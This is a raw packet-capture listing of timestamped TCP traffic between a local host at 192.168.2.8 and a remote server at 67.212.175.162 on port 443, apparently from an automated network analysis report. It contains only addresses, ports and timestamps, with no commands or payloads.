                                            Oct 1, 2024 07:31:51.100400925 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.100461006 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.100667000 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.100728989 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.100891113 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.100955963 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.115998030 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.116121054 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.116132021 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.116147041 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.116183996 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.116266966 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.116329908 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185548067 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.185611963 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.185627937 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185648918 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.185662031 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185682058 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185718060 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.185767889 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185820103 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.185872078 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.185981989 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186047077 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.186108112 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186163902 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.186372995 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186433077 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.186598063 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186640978 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186642885 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.186652899 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186682940 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.186729908 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.186789989 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.187004089 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.187057018 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.187140942 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.187190056 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.187391996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.187443972 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.206676006 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.206768036 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.206867933 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.206919909 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.206927061 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.206937075 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.206973076 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.206993103 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277034998 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277122021 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277168989 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277189016 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277230978 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277231932 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277251959 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277256966 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277271032 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277277946 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277324915 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277332067 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277407885 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277448893 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277456045 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277462006 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277493954 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277621031 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277686119 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277848005 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277892113 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277894974 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277904034 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277944088 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277946949 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277957916 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.277985096 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.277998924 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.278376102 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.278412104 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.278443098 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.278450012 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.278477907 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.278496027 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.297445059 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.297518969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.297544003 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.297590971 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.297651052 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.297704935 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.366889954 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.366992950 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.366996050 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367017031 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367047071 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367069006 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367089987 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367146015 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367238998 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367306948 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367439985 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367500067 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367686033 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367718935 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367743015 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367750883 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.367767096 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.367784023 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368087053 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368141890 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368155003 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368161917 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368187904 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368201971 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368309975 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368369102 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368453979 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368505955 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368514061 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368519068 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368555069 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368571997 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.368851900 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.368910074 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.388006926 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.388087034 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.388154030 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.388207912 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.388349056 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.388405085 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.457603931 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.457668066 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.457741022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.457762957 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.457788944 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.457807064 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.457818031 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.457866907 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.457899094 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.457946062 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458115101 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458173990 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458383083 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458431005 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458432913 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458444118 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458476067 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458606958 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458662033 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458833933 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.458884954 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.458961010 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.459007978 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.459037066 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.459080935 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.459212065 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.459266901 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.459494114 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.459542036 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.478966951 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.479010105 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.479048967 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.479084969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.479104996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.479119062 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.522738934 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548425913 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548501968 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548634052 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548677921 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548707008 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548716068 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548729897 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548732996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548751116 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548757076 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548782110 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548810005 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.548872948 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.548935890 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549010992 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549055099 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549268007 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549324036 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549324036 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549338102 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549374104 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549385071 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549632072 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549674988 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549700022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549707890 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.549731970 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549746037 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.549945116 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.550003052 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.550030947 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.550084114 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.550259113 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.550308943 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.550343990 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.550395966 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.569864988 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.569910049 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.569955111 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.569969893 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.569979906 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.570060015 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.570115089 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.570123911 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.570168972 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.639390945 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639478922 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639513969 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639549971 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.639571905 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639604092 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.639616966 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639672041 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.639678955 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639811039 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.639863968 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.639873028 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640039921 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640083075 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640098095 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640104055 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640141010 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640155077 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640286922 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640341997 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640553951 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640585899 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640604973 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640611887 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640630960 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640645981 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640681028 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.640758038 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.640963078 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.641021967 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.641088963 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.641144991 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.660789013 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.660851002 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.660891056 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.660909891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.660922050 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.660931110 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.660953045 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.710268021 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730133057 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730192900 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730242014 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730241060 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730257988 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730293036 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730349064 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730407000 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730416059 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730613947 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730676889 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730684996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730695963 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730751038 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730757952 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730848074 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730900049 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.730906963 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.730952978 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731015921 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731021881 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731132984 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731189966 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731198072 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731421947 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731476068 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731482029 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731525898 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731579065 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731585979 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731662035 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731714964 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731723070 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731933117 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.731983900 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.731991053 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751457930 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751584053 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.751585960 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751605034 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751655102 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751667023 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.751678944 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.751709938 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.751741886 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.752564907 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.752705097 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.820635080 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.820771933 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.820818901 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.820873976 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.820944071 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821002960 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821142912 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821202993 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821259022 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821314096 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821369886 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821424007 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821547031 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821604013 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821690083 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821747065 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821902037 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821969032 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822094917 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822150946 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822171926 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822227955 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822232962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822246075 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822287083 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822720051 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822767019 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822793007 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822805882 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822829008 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822855949 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842120886 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842202902 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842235088 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842294931 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842365980 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842437029 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.851912022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.852011919 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911691904 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911742926 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911767960 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911792994 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911808014 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911828995 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911942005 CEST4434971467.212.175.162192.168.2.8
